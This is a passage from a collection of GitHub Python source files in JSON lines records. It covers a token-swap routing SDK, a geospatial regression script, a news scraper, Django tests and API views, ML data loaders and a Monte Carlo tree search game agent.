PoolFactoryProvider,\n pools: List[Pool],\n currencyIn: Currency,\n currencyAmountOut: CurrencyAmount,\n options: BestTradeOptions = BestTradeOptions(3, 3),\n # used in recursion.\n currentPools: List[Pool] = None,\n nextAmountOut: CurrencyAmount = None,\n bestTrades: List['Trade'] = None\n ) -> List['Trade']:\n \"\"\"\n * similar to the above method but instead targets a fixed output amount\n * given a list of pools, and a fixed amount out, returns the top `maxNumResults` trades that go from an input token\n * to an output token amount, making at most `maxHops` hops\n * note this does not consider aggregation, as routes are linear. it's possible a better route exists by splitting\n * the amount in among multiple routes.\n * @param pools the pools to consider in finding the best trade\n * @param currencyIn the currency to spend\n * @param currencyAmountOut the desired currency amount out\n * @param nextAmountOut the exact amount of currency out\n * @param maxNumResults maximum number of results to return\n * @param maxHops maximum number of hops a returned trade can make, e.g. 1 hop goes through a single pool\n * @param currentPools used in recursion; the current list of pools\n * @param bestTrades used in recursion; the current list of best trades\n * @returns The exact out trade\n \"\"\"\n if nextAmountOut is None:\n nextAmountOut = currencyAmountOut\n\n if bestTrades is None:\n bestTrades = []\n\n if currentPools is None:\n currentPools = []\n\n maxNumResults = options.maxNumResults\n maxHops = options.maxHops\n\n assert len(pools) > 0, 'POOLS'\n assert maxHops > 0, 'MAX_HOPS'\n assert currencyAmountOut == nextAmountOut or len(currentPools) > 0, 'INVALID_RECURSION'\n\n amountOut = nextAmountOut.wrapped\n tokenIn = currencyIn.wrapped\n for i in range(len(pools)):\n pool = pools[i]\n # pool irrelevant\n if (not pool.token0.equals(amountOut.currency) and not pool.token1.equals(amountOut.currency)):\n continue\n\n amountIn: CurrencyAmount\n try:\n amountIn, _ = pool.getInputAmount(amountOut)\n except InsufficientInputAmountError as error:\n # input too low\n if (error.isInsufficientInputAmountError):\n continue\n raise error\n \n # we have arrived at the input token, so this is the first trade of one of the paths\n if (amountIn.currency.equals(tokenIn)):\n sortedInsert(\n bestTrades,\n Trade.fromRoute(\n poolFactoryProvider,\n Route([pool] + currentPools, currencyIn, currencyAmountOut.currency),\n currencyAmountOut,\n TradeType.EXACT_OUTPUT\n ),\n maxNumResults,\n tradeComparator\n )\n elif (maxHops > 1 and len(pools) > 1):\n poolsExcludingThisPool = pools[0:i] + pools[i+1:]\n\n # otherwise, consider all the other paths that arrive at this token as long as we have not exceeded maxHops\n Trade.bestTradeExactOut(\n poolFactoryProvider,\n poolsExcludingThisPool,\n currencyIn,\n currencyAmountOut,\n BestTradeOptions (\n maxNumResults,\n maxHops - 1\n ),\n [pool] + currentPools,\n amountIn,\n bestTrades\n )\n\n return bestTrades\n","repo_name":"Convexus-Protocol/convexus-sdk-py","sub_path":"convexus/sdk/entities/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":24804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"41982440598","text":"\"\"\"\n author: rkopeinig\n script: Workflow\n description: Workflow of retrieving time series from GeoJSON, aggregate, smooth and perform linear regression\n date: 07/27/2018\n version: 1.0\n\"\"\"\n\n# Import dependencies\nimport fire, datetime, requests, json\nimport pandas as pd\nimport geopandas as gpd\nfrom dataclient.tsservice import get_curve, TSService\nfrom dateutil import parser\nfrom pytsa.preprocessing import savitz_golay\nfrom sklearn import linear_model\n\n\n# How to:\n'''\npython workflow.py --coverageId 'PROBAV_L3_S10_TOC_NDVI_333M' --start_date '2013-10-11T00:00Z' --end_date '2018-07-01T00:00Z' --geometry '../../../../data/ASB/geojson/ca.geojson' --aggregate 'M' --aggregate_function 'mean' --window 10 --polyorder 2 --output_folder '../../../../data/ASB/output/'\n'''\n\nclass TimeSeries(object):\n def __init__(self, coverageId, start_date, end_date, geometry, aggregate, aggregate_function, window, polyorder, output_folder):\n self.coverageId = coverageId\n self.start_date = start_date\n self.end_date = end_date\n self.geometry = geometry\n self.aggregate = aggregate\n self.aggregate_function = aggregate_function\n self.output = output_folder\n self.time_series = self.get_time_series_from_geojson(self.coverageId,\n self.geometry,\n self.start_date,\n self.end_date)\n\n self.time_series = self.time_series.resample(self.aggregate, how=self.aggregate_function)\n self.time_series = savitz_golay(self.time_series,window=window,polyorder=polyorder)\n\n self.lm = linear_model.LinearRegression()\n self.X = pd.DataFrame({'1': self.time_series[1],\n '2': self.time_series[2],\n '3': self.time_series[3]}, index=self.time_series.index)\n self.y = pd.DataFrame(self.time_series[0], index=self.time_series.index)\n\n model = self.lm.fit(self.X, self.y)\n predictions = self.lm.predict(self.X)\n self.result = pd.DataFrame(predictions, index=self.X.index)\n\n self.save()\n\n\n def get_time_series_from_geojson(self, coverage_id, geojson_path, start_date, end_date):\n with open(geojson_path) as f:\n data = json.load(f)\n\n geojson_dataframe = gpd.read_file(geojson_path)\n start_date = parser.parse(start_date)\n end_date = parser.parse(end_date)\n iterable = TSService().timeseries_async(coverage_id, geojson_dataframe, start_date, end_date)\n ts = []\n for i in iterable:\n ts.append(i)\n return pd.DataFrame(ts).T\n\n\n def save(self):\n self.time_series.to_csv(self.output+'time_series.csv')\n self.result.to_csv(self.output+'lin_reg_result.csv')\n\nif __name__ == '__main__':\n fire.Fire(TimeSeries)\n\n","repo_name":"LIST-LUXEMBOURG/ASB_integration","sub_path":"Python/workflow/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18771318216","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n# phòng nhiều web sẽ bắt xác nhận có phải robot hay không\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nf = open('D:\\coder\\DATA_ENGINEER\\PYTHON\\PYTHON\\THUC_HANH\\craw_data_article\\list_data_article.csv',\n 'w', encoding='utf-8')\n\nr = requests.get(\"https://dantri.com.vn\", headers=headers)\nhead = \"link_img , title \\n\"\nf.write(head)\n# # lấy data trên web về\n# # - text : lấy mỗi chữ\n# # - content : lấy cả hình ảnh ,...\n# # - json() : lấy kiểu dạng json\n\n\nif r.status_code == 200:\n # kiểm tra trạng thái : json or status_code => 200 -> success , 400 -> false\n soup = BeautifulSoup(r.text, 'html.parser')\n data = soup.find_all(\"article\")\n i = 1\n for row in data:\n\n print(\"counter : \", i)\n # --------- img\n link_img = \"https://dantri.com.vn\" + \\\n row.find('a').get('href').strip()\n\n # ----- title\n # method BeautifulSoup : text = get_text()\n title = row.find('h3').get_text().strip().replace(\"\\n\", ' ')\n\n # result\n file_csv = f'{link_img}, {title} , \\n'\n f.write(file_csv)\n i += 1\nelse:\n print(\"Không tìm thấy đường link \")\n\nf.close\n","repo_name":"Duancoderdao/project_py","sub_path":"crawl_data_test/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22179020976","text":"import uuid\n\nimport pytest\n\nfrom uber.decorators import id_required\nfrom uber.errors import HTTPRedirect\nfrom uber.models import Attendee, Group, Session\n\n\nclass TestIdRequired:\n\n @pytest.mark.parametrize('ModelClass', [Attendee, Group])\n @pytest.mark.parametrize('params', [\n {},\n {'not_an_id': 'not an id'},\n {'id': None},\n {'id': []},\n {'id': {}},\n {'id': ''},\n {'id': 'Invalid UUID'},\n {'id': 'd17fbcba-d5cc-44de-8cb1-83091211a829'} # Non-existent id\n ])\n def test_model_id_invalid(self, ModelClass, params):\n\n @id_required(ModelClass)\n def _requires_model_id(**params):\n return True\n\n params['session'] = Session().session\n pytest.raises(HTTPRedirect, _requires_model_id, **params)\n\n @pytest.mark.parametrize('ModelClass', [Attendee, Group])\n def test_model_id_valid(self, ModelClass):\n\n @id_required(ModelClass)\n def _requires_model_id(**params):\n return True\n\n with Session() as session:\n model = ModelClass()\n session.add(model)\n session.flush()\n model_id = uuid.UUID(model.id)\n assert _requires_model_id(**{\n 'session': session,\n 'id': 'None'}) # We explicitly allow the string 'None'\n assert _requires_model_id(**{\n 'session': session,\n 'id': model_id}) # 'id' as a uuid.UUID() instance\n assert _requires_model_id(**{\n 'session': session,\n 'id': model_id.hex}) # 'id' as a str instance\n","repo_name":"magfest/ubersystem","sub_path":"tests/uber/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"}
+{"seq_id":"33867431518","text":"import warnings\nfrom typing import Optional, Tuple\n\nwarnings.filterwarnings(\"ignore\")\n\nimport structlog\nfrom mlflow.tracking import MlflowClient\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import ImageFolder\n\nLOGGER = structlog.get_logger()\n\nfrom torchvision import transforms\n\n\ndef download_image_archive(\n run_id: str, archive_path: str, destination_path: Optional[str] = None\n) -> str:\n client: MlflowClient = MlflowClient()\n image_archive_path: str = client.download_artifacts(\n run_id=run_id, path=archive_path, dst_path=destination_path\n )\n LOGGER.info(\n \"Image archive downloaded\",\n run_id=run_id,\n storage_path=archive_path,\n dst_path=image_archive_path,\n )\n return image_archive_path\n\n\ndef create_image_dataset(\n data_dir: str,\n rescale: float = 1.0 / 255,\n validation_split: float = 0.2,\n batch_size: int = 32,\n seed: int = 8237131,\n label_mode: str = \"categorical\",\n color_mode: str = \"grayscale\",\n image_size: Tuple[int, int] = (28, 28),\n):\n if color_mode == \"grayscale\":\n transform = transforms.Compose(\n [\n # you can add other transformations in this list\n transforms.ToTensor(),\n transforms.Grayscale(),\n ]\n )\n else:\n transform = transforms.Compose(\n [\n # you can add other transformations in this list\n transforms.ToTensor()\n ]\n )\n\n dataset = ImageFolder(root=data_dir, transform=transform)\n data_generator = DataLoader(dataset, batch_size=batch_size, shuffle=True)\n return data_generator\n","repo_name":"hhuangMITRE/dioptra","sub_path":"examples/pytorch-mnist-membership-inference/src/data_pytorch.py","file_name":"data_pytorch.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"33474008341","text":"#!/usr/bin/python3\nimport execjs\nf = open('./sign.js', 'r', encoding='utf-8')\nline = f.readline()\nhtmlstr = ''\nwhile line:\n htmlstr = htmlstr + line\n line = f.readline()\nctx = execjs.compile(htmlstr)\n\n# 调用js方法\ndef run_js(params):\n return ctx.call('createSign', params)\n","repo_name":"Pr0mi5e/python2smb","sub_path":"script/runjs.py","file_name":"runjs.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4923733602","text":"import numpy as np\nimport cv2\nimport os\nimport random\n\n\n\nscript_crop_path = 'champs/' #Path that contains all headshots of the champs\nsave_path = 'training_set/' #Path that the training sets and testing sets will be saved\ntest_ratio = 0.05 #Ratio of test images\n\nchampions_found = []\n\ntrain_images = []\ntrain_labels = []\n\ntest_images = []\ntest_labels = []\n\ndef create_class_txt():\n global champions_class\n \"\"\"\n create a .txt file that records the index of class\n \"\"\"\n file = open(save_path+'class.txt', 'w')\n for champion_name in os.listdir(script_crop_path):\n if champion_name in champions_class:\n file.write(str(champions_class.index(champion_name)) + \n ':' + \n str(champion_name)\n + '\\n')\n return True\n\ndef create_train_data():\n \"\"\"\n Creates the .npy file of the training and testing sets\n \"\"\"\n global toDisplay\n r_max = int(1/test_ratio)\n n = 1\n for champion_name in os.listdir(script_crop_path):\n if champion_name in champions_class:\n champions_found[champions_class.index(champion_name)] = 1\n for image in os.listdir(script_crop_path+champion_name+'/'):\n img = cv2.imread(script_crop_path+champion_name+'/'+image)\n img = cv2.resize(img,(24,24))\n r = random.randint(1,r_max)\n if r == 1:\n test_images.append(img)\n test_labels.append(champions_class.index(champion_name))\n else:\n train_images.append(img)\n train_labels.append(champions_class.index(champion_name))\n n = n + 1\n\ndef launchScanner():\n global train_images,train_labels,test_images,test_labels,champions_class,toDisplay,KEEP_DISPLAYING\n global champions_found\n \n KEEP_DISPLAYING = True\n train_images = []\n train_labels = []\n\n test_images = []\n test_labels = []\n \n #Open the file and read the selected champions from it\n file = open(\"selectedChampions.txt\", \"r\")\n selectedChampionsString = file.readline()\n champions_class = selectedChampionsString.split(',')\n champions_found = [0 for n in range(len(champions_class))]\n \n create_class_txt()\n create_train_data()\n\n train_images = np.array(train_images)\n train_labels = np.array(train_labels)\n test_images = np.array(test_images)\n test_labels = np.array(test_labels)\n\n np.save(save_path +\"train_images\", train_images)\n np.save(save_path +\"train_labels\", train_labels)\n np.save(save_path +\"test_images\", test_images)\n np.save(save_path +\"test_labels\", test_labels)\n print(\"--------------------------------------------\")\n print(\"Train images size: \" + str(train_images.shape))\n print(\"Train labels size: \" + str(train_labels.shape))\n print(\"Test images size : \" + str(test_images.shape))\n print(\"Test labels size : \" + str(test_labels.shape))\n champions_found_string = ''\n for n in range(len(champions_class)):\n if champions_found[n] == 0:\n champions_found_string = champions_found_string + str(champions_class[n]) + \": not found, \"\n else:\n champions_found_string = champions_found_string + str(champions_class[n]) + \": found, \" \n print(champions_found_string)\n return champions_found\n\n\n\n\n\n\n","repo_name":"dcheng728/League-X","sub_path":"launch_scanner.py","file_name":"launch_scanner.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"}
+{"seq_id":"73564010322","text":"#coding=utf-8\n#date:14-11-4\n__author__ = 'monica'\n\nfrom rest_framework.views import APIView\nfrom kindergarten.models import User,TeacherInfo\nfrom django.http import HttpResponse\nfrom kindergarten.script.util import Util\nfrom model_serializer import TeacherListSerializer\nfrom kindergarten.script.func import Func\nimport time\nfunc=Func()\n\n'''获取列表'''\nclass GetTeacherList(APIView):\n def get(self, request, **kwargs):\n #分页\n pagesize, pageindex = Util.getPageSizeAndIndex(request)\n args={}\n #查询条件\n if 'name' in request.GET and request.GET['name']:\n args['name__contains'] = request.GET['name'].strip()\n datalist , counts = func.GetTeacherPageList(pagesize, pageindex,**args)\n data=TeacherListSerializer(datalist).data\n return Util.GetResponseData(True,0,data,counts)\n\n'''添加/修改'''\nclass AddTeacher(APIView):\n def post(self, request, **kwargs):\n if 'name' in request.POST and request.POST['name']:\n name = request.POST['name'].strip()\n #如果有id,则修改\n if 'id' in request.POST and request.POST['id']:\n teacherid=request.POST['id']\n try:\n teacher=TeacherInfo.objects.get(id=teacherid)\n except TeacherInfo.DoesNotExist:\n return Util.GetResponseData(False,410)\n teacher.name = name\n teacher.modifytime = time.time()\n else:\n #新建\n teacher=TeacherInfo.objects.create(name=name)\n if 'sex' in request.POST and request.POST['sex']:\n teacher.sex = request.POST['sex'].strip()\n if 'birthday' in request.POST and request.POST['birthday']:\n teacher.birthday = request.POST['birthday'].strip()\n if 'phone' in request.POST:\n teacher.phone = request.POST['phone'].strip()\n if 'city' in request.POST:\n teacher.city = request.POST['city'].strip()\n if 'address' in request.POST:\n teacher.address = request.POST['address'].strip()\n if 'joindate' in request.POST and request.POST['joindate']:\n teacher.joindate = request.POST['joindate'].strip()\n if 'educate_school' in request.POST:\n teacher.educate_school = request.POST['educate_school'].strip()\n if 'degree' in request.POST and request.POST['degree']:\n teacher.degree = request.POST['degree'].strip()\n if 'teaching' in request.POST:\n teacher.teaching = request.POST['teaching'].strip()\n if 'photo' in request.POST and request.POST['photo']:\n teacher.photo = request.POST['photo'].strip()\n teacher.save()\n return Util.GetResponseData(True,0,teacher.id)\n else:\n return Util.GetResponseData(False,-3)\n\n'''设置教师头像'''\nclass SetTeacherPhoto(APIView):\n def post(self, request, **kwargs):\n if 'teacherid' in kwargs and kwargs['teacherid']:\n teacherid = kwargs['teacherid']\n try:\n teacher = TeacherInfo.objects.get(id=teacherid)\n except TeacherInfo.DoesNotExist:\n return Util.GetResponseData(False,410)\n istop=True\n if 'photo' in kwargs and kwargs['istop']:\n teacher.photo = kwargs['photo'].strip()\n teacher.save()\n return Util.GetResponseData(True)\n return Util.GetResponseData(False,-3)\n\n'''删除'''\nclass DeleteTeacher(APIView):\n def post(self, request, **kwargs):\n if 'teacherid' in kwargs and kwargs['teacherid']:\n teacherid=kwargs['teacherid']\n try:\n teacher=TeacherInfo.objects.get(id=teacherid)\n except TeacherInfo.DoesNotExist:\n return Util.GetResponseData(False,410)\n teacher.delete()\n return Util.GetResponseData(True)\n else:\n return Util.GetResponseData(False,-3)\n","repo_name":"dengqiuhua/kindergarten","sub_path":"kindergarten/api/api_teacher.py","file_name":"api_teacher.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"74498118800","text":"from game import play\nfrom game.actions import MoveOnePiece\nfrom agents import Agent\nfrom training import constants as model_const, decode, model\nimport encoders.game_state as gs_enc\nimport game.state_change as sc\n\nimport attr\nimport numpy as np\nimport logging\nimport time\n\nfrom collections import defaultdict\nfrom enum import Enum\n\nlogger = logging.getLogger('mcts_zero_debug_logger')\nlogger.setLevel(logging.ERROR)\n\n\n@attr.s(slots=True)\nclass ExperienceCollector:\n indices_by_faction_name = attr.ib()\n game_states = attr.ib(factory=list)\n move_visits = attr.ib(factory=list)\n winner = attr.ib(default=None)\n\n def record_move(self, game_state, move_visits):\n self.game_states.append(game_state)\n self.move_visits.append(move_visits)\n\n def complete_episode(self, winner):\n self.winner = winner\n\n @staticmethod\n def _assign_move_probs_aux(values_and_move_probs, row, output_head, decoder, move_visits):\n for move in move_visits.keys():\n move_prob = move_visits[move] / sum(move_visits.values())\n head = values_and_move_probs[output_head]\n head[row, decoder(move)] = move_prob\n\n @staticmethod\n def _assign_move_probs(values_and_move_probs, row, top_action_class, move_visits):\n output_head = decode.model_head_by_action_class[top_action_class].value\n decoder = decode.decoders[top_action_class]\n ExperienceCollector._assign_move_probs_aux(values_and_move_probs, row, output_head, decoder, move_visits)\n\n @staticmethod\n def _assign_move_probs__move_one_piece(values_and_move_probs, row, move_visits):\n board_coord_visits = defaultdict(int)\n piece_type_visits = defaultdict(int)\n for move, visits in move_visits.items():\n board_coords, piece_type = move\n board_coord_visits[board_coords] += visits\n piece_type_visits[piece_type] += visits\n ExperienceCollector._assign_move_probs_aux(values_and_move_probs, row, model_const.Head.BOARD_COORDS_HEAD.value,\n decode.decode_board_space, board_coord_visits)\n ExperienceCollector._assign_move_probs_aux(values_and_move_probs, row, model_const.Head.PIECE_TYP_HEAD.value,\n decode.decode_enum_value, piece_type_visits)\n\n def to_numpy(self):\n encoded_game_states = [gs_enc.encode(game_state) for game_state in self.game_states]\n encoded_boards = np.array([egs.board for egs in encoded_game_states])\n encoded_data = np.array([egs.encoded_data() for egs in encoded_game_states])\n values_and_move_probs = model.empty_heads(len(self.game_states))\n values_and_move_probs[model_const.Head.VALUE_HEAD.value][:, self.indices_by_faction_name[self.winner]] = 1\n for i, game_state in enumerate(self.game_states):\n top_action_class = game_state.action_stack.first.__class__\n if top_action_class is MoveOnePiece:\n # If the action is [MoveOnePiece], we can't just use a decoder as normal. We need to compute probabilities\n # for both board space and piece type from the available choices.\n ExperienceCollector._assign_move_probs__move_one_piece(values_and_move_probs, i, self.move_visits[i])\n else:\n ExperienceCollector._assign_move_probs(values_and_move_probs, i, top_action_class, self.move_visits[i])\n\n return encoded_boards, encoded_data, values_and_move_probs\n\n\n@attr.s(slots=True)\nclass Branch:\n # Prior probability of choosing this branch, based on the model's prediction\n # for the parent state\n prior = attr.ib()\n visit_count = attr.ib(default=0)\n total_value = attr.ib(default=0.0)\n\n\n@attr.s(slots=True)\nclass Node:\n game_state = attr.ib()\n # Mapping from player faction to value for this state\n values = attr.ib()\n # [parent] and [last_move] are stored to facilitate propagating values back up the tree\n parent = attr.ib()\n last_move = attr.ib()\n total_visit_count = attr.ib(default=1)\n branches = attr.ib(factory=dict)\n children = attr.ib(factory=dict)\n\n @classmethod\n def from_state(cls, state, values, parent, last_move, priors):\n node = cls(state, values, parent, last_move)\n for move, p in priors.items():\n node.branches[move] = Branch(p)\n if parent is not None:\n parent._add_child(last_move, node)\n return node\n\n def moves(self):\n return list(self.branches.keys())\n\n def _add_child(self, move, child_node):\n self.children[move] = child_node\n\n def has_child(self, move):\n return move in self.children\n\n def expected_value(self, move):\n branch = self.branches[move]\n if branch.visit_count == 0:\n return 0.0\n return branch.total_value / branch.visit_count\n\n def prior(self, move):\n return self.branches[move].prior\n\n def visit_count(self, move):\n return self.branches[move].visit_count\n\n def record_visit(self, move, value):\n self.total_visit_count += 1\n self.branches[move].visit_count += 1\n self.branches[move].total_value += value\n\n def propagate_values(self):\n node = self\n values = node.values\n while node.parent is not None:\n last_move = node.last_move\n value_for_current_node = values[sc.get_current_player(node.parent.game_state).faction_name()]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Recording a visit for {node.parent.game_state.action_stack.first.__class__}')\n node.parent.record_visit(last_move, value_for_current_node)\n node = node.parent\n\n\n# TODO: IMPORTANT - SHARE THE TREE BETWEEN SIMULATIONS OF THE SAME GAME\n@attr.s(slots=True)\nclass MCTSZeroAgent(Agent):\n simulations_per_choice = attr.ib()\n c = attr.ib()\n view = attr.ib()\n worker_env_conn = attr.ib()\n experience_collectors = attr.ib(factory=dict)\n\n def begin_episode(self, factions):\n for faction in factions:\n self.experience_collectors[faction] = None\n\n def complete_episode(self, winner):\n for experience_collector in self.experience_collectors.values():\n experience_collector.complete_episode(winner)\n\n def select_branch(self, node):\n total_n = node.total_visit_count\n\n def score_branch(move):\n q = node.expected_value(move)\n p = node.prior(move)\n n = node.visit_count(move)\n score = q + self.c * p * np.sqrt(total_n) / (n + 1)\n # if logger.isEnabledFor(logging.DEBUG):\n # logger.debug(f'Evaluating move {move}')\n # logger.debug(f'EV: {q}; P: {p}; VC: {n}; Score: {score}')\n return score\n\n return max(node.moves(), key=score_branch)\n\n # Even though [choices] is implied by [game_state], we pass it in here to avoid recomputing it\n # since we needed to compute it in the initial call to [select_move] in order to shortcut in the\n # event that there are 0 or 1 choices.\n async def create_node_async(self, game_state, choices, move=None, parent=None):\n if game_state.is_over():\n values = {}\n for player in game_state.players_by_idx:\n faction_name = player.faction_name()\n values[faction_name] = 1 if faction_name is game_state.winner else 0\n move_priors = {}\n else:\n t = time.time()\n # Encode game state and write to shared memory\n encoded_game_state = gs_enc.encode(game_state)\n assert self.view.board.shape == encoded_game_state.board.shape\n self.view.board[:] = encoded_game_state.board\n encoded_data = encoded_game_state.encoded_data()\n assert self.view.data.shape == encoded_data.shape\n self.view.data[:] = encoded_data\n self.worker_env_conn.wake_up_env()\n await self.worker_env_conn.worker_get_woken_up()\n # Read the predictions out of shared memory and convert them to values and move priors\n values, move_priors = model.to_values_and_move_priors(game_state, choices, self.view.preds)\n # print(f'Took {time.time() - t}s to get evaluation results')\n new_node = Node.from_state(game_state, values, parent, move, move_priors)\n # if parent is not None:\n # parent.add_child(move, new_node)\n return new_node\n\n async def select_move_async(self, game_state):\n faction_name = sc.get_current_player(game_state).faction_name()\n if self.experience_collectors[faction_name] is None:\n indices_by_faction_name = gs_enc.get_indices_by_faction_name(game_state)\n self.experience_collectors[faction_name] = ExperienceCollector(indices_by_faction_name)\n\n choices = game_state.legal_moves()\n if not choices:\n return None\n if len(choices) == 1:\n return choices[0]\n\n old_level = logging.getLogger().level\n logging.getLogger().setLevel(logging.ERROR)\n root = await self.create_node_async(game_state, choices)\n\n for i in range(self.simulations_per_choice * len(choices)):\n logger.debug('STARTING AT THE ROOT')\n node = root\n while node.moves():\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Selecting a branch for {node.game_state.action_stack.first.__class__}')\n move = self.select_branch(node)\n if node.has_child(move):\n node = node.children[move]\n else:\n break\n\n if node.game_state.is_over():\n values_to_propagate = {faction_name: 1 if faction_name is game_state.winner else 0\n for faction_name in game_state.player_idx_by_faction_name.keys()}\n else:\n new_state = play.apply_move(node.game_state, move)\n legal_moves = new_state.legal_moves()\n while not new_state.is_over() and (not legal_moves or len(legal_moves) == 1):\n new_state = play.apply_move(new_state, None) if not legal_moves \\\n else play.apply_move(new_state, legal_moves[0])\n legal_moves = new_state.legal_moves()\n node = await self.create_node_async(new_state, legal_moves, move, parent=node)\n values_to_propagate = node.values\n\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Propagating values {values_to_propagate}')\n while node.parent is not None:\n faction_name = sc.get_current_player(node.parent.game_state).faction_name()\n value = values_to_propagate[faction_name]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Recording a value of {value} for player {faction_name}')\n node.parent.record_visit(move, value)\n move = node.parent.last_move\n node = node.parent\n\n logging.getLogger().setLevel(old_level)\n legal_moves = root.moves()\n move_visits = {move: root.visit_count(move) for move in legal_moves}\n assert len(legal_moves) == len(move_visits)\n self.experience_collectors[faction_name].record_move(game_state, move_visits)\n total_moves = sum(move_visits.values())\n probas = [mv / total_moves for mv in move_visits.values()]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Probability distribution for {legal_moves}: {probas}')\n # Have to do this annoying thing because [legal_moves] might contain tuples\n return legal_moves[np.random.choice(range(len(legal_moves)), p=probas)]\n\n\n@attr.s(slots=True)\nclass MCTSZeroAgentManual:\n worker_id = attr.ib()\n env_slot = attr.ib()\n simulations_per_choice = attr.ib()\n c = attr.ib()\n view = attr.ib()\n current_tree_root = attr.ib(default=None)\n current_tree_node = attr.ib(default=None)\n current_simulation = attr.ib(default=0)\n experience_collectors = attr.ib(factory=dict)\n old_logging_level = attr.ib(default=None)\n pending_game_state_and_choices_and_move = attr.ib(default=None)\n timestamp = attr.ib(default=None)\n\n def begin_episode(self, faction_names):\n self.experience_collectors = {faction_name: None for faction_name in faction_names}\n self.current_tree_node = None\n self.current_tree_root = None\n self.current_simulation = 0\n self.pending_game_state_and_choices_and_move = None\n self.timestamp = time.time()\n\n def complete_episode(self, winner):\n for experience_collector in self.experience_collectors.values():\n experience_collector.complete_episode(winner)\n print(f'Worker {self.worker_id} finished a game in slot {self.env_slot} in {time.time() - self.timestamp}s')\n\n def select_branch(self, node):\n total_n = node.total_visit_count\n\n def score_branch(move):\n q = node.expected_value(move)\n p = node.prior(move)\n n = node.visit_count(move)\n score = q + self.c * p * np.sqrt(total_n) / (n + 1)\n # if logger.isEnabledFor(logging.DEBUG):\n # logger.debug(f'Evaluating move {move}')\n # logger.debug(f'EV: {q}; P: {p}; VC: {n}; Score: {score}')\n return score\n\n return max(node.moves(), key=score_branch)\n\n class Result(Enum):\n PREDICTIONS_NEEDED = 0\n MOVE_SELECTED = 1\n GAME_OVER = 2\n NEXT_SIMULATION = 3\n\n def send_encodings_to_evaluator(self, game_state):\n encoded_game_state = gs_enc.encode(game_state)\n self.view.write_board(encoded_game_state.board, self.env_slot)\n encoded_data = encoded_game_state.encoded_data()\n self.view.write_data(encoded_data, self.env_slot)\n\n def handle_terminal_state(self):\n # We are at a terminal state, so just do propagation and move to the next simulation. There are\n # fancier things we can do later to prevent this state from being reached again.\n self.current_tree_node.propagate_values()\n self.current_tree_node = self.current_tree_root\n return MCTSZeroAgentManual.Result.NEXT_SIMULATION, None\n\n def advance_until_predictions_needed_or_move_selected_or_game_over(self, root_game_state, root_choices):\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Call to advance. Current simulation: {self.current_simulation} out of {self.simulations_per_choice}')\n faction_name = sc.get_current_player(root_game_state).faction_name()\n if self.experience_collectors[faction_name] is None:\n # This is the first move of the game made by this player. We need to assign an experience collector and\n # also create a root node. To create the root node we'll need to send the current game state over\n # to the evaluator and wait for predictions back. Once we have them we can create the node, without\n # doing the value propagation that we would normally do when creating a node.\n indices_by_faction_name = gs_enc.get_indices_by_faction_name(root_game_state)\n self.experience_collectors[faction_name] = ExperienceCollector(indices_by_faction_name)\n\n # [root_game_state] and [root_choices] refer to the state for which we're trying to select a move. When\n # this function is called, we're somewhere in the middle of a MCTS simulation. We could be just starting,\n # in which case we'd need to create a root node, or we could be starting a new iteration (then the current\n # tree node would also be the root node), or we could be in the middle of an iteration.\n if self.current_tree_root is None:\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Starting a simulation for {root_game_state.action_stack.first.__class__} with legal moves {root_choices}')\n # We need to create the root of the tree. We'll need predictions just to do that, so we\n # can stop there.\n\n assert len(root_choices) > 1\n\n self.old_logging_level = logging.getLogger().level\n logging.getLogger().setLevel(logging.ERROR)\n\n if root_game_state.is_over():\n return MCTSZeroAgentManual.Result.GAME_OVER, None\n\n # Save these for the decoding step\n self.pending_game_state_and_choices_and_move = root_game_state, root_choices, None\n self.send_encodings_to_evaluator(root_game_state)\n return MCTSZeroAgentManual.Result.PREDICTIONS_NEEDED, None\n\n if self.current_simulation == self.simulations_per_choice:\n # We've done all of the simulating that we need to and can select a move in the normal way: get\n # the probability distribution from the visits of each of the children of the root. At this point\n # we can also reinstall the initial logging level.\n logging.getLogger().setLevel(self.old_logging_level)\n legal_moves = self.current_tree_root.moves()\n move_visits = {move: self.current_tree_root.visit_count(move) for move in legal_moves}\n self.experience_collectors[faction_name].record_move(root_game_state, move_visits)\n total_moves = sum(move_visits.values())\n probas = [move_visits[m] / total_moves for m in legal_moves]\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(f'Finishing simulation for {self.current_tree_root.game_state.action_stack.first.__class__}')\n logger.debug(f'Move visits: {move_visits}')\n logger.debug(f'Probability distribution for {legal_moves}: {probas}')\n self.current_simulation = 0\n self.current_tree_root = self.current_tree_node = None\n # Have to do this annoying thing because [legal_moves] might contain tuples\n return MCTSZeroAgentManual.Result.MOVE_SELECTED, legal_moves[np.random.choice(range(len(legal_moves)),\n 